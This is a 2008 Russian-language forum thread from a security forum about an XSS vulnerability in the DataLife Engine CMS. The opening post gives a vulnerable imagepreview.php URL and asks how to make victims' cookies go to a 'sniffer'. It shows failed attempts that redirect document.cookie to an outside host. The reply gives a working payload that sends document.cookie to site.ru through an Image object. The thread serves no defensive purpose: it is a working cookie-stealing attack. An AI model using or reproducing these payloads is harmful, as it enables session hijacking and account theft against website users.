HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу XSS в DataLife Engine. Обсуждение.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в DataLife Engine. Обсуждение.
  #1  
Старый 02.08.2008, 13:12
Dr.Bodja
Познающий
Регистрация: 27.08.2006
Сообщений: 52
Провел на форуме:
338724

Репутация: 15
По умолчанию XSS в DataLife Engine. Обсуждение.
Есть уязвимость
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);
Нужно прилепить сниффер, чтобы куки на сниффер шли.

Пробывал так
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location="http://site.ru/s.gif?"+document.cookie);
И так
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location("http://site.ru/s.gif?"+document.cookie));
Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?

ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.

Зарание спасибо за помощь.

С ув. DrBodja.
 
Ответить с цитированием

  #2  
Старый 02.08.2008, 13:37
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
И зачем ты делаешь document.location?
Ты хочешь словить пустые куки?

Цитата:
http://target.ru/engine/modules/imagepreview.php?image=javascript:img=new Image();img.src="http://site.ru/s.gif?"+document.cookie;
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
DataLife Engine v.7.0 Nulled *DeViL* ПО для Web разработчика 3 04.05.2008 14:36
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ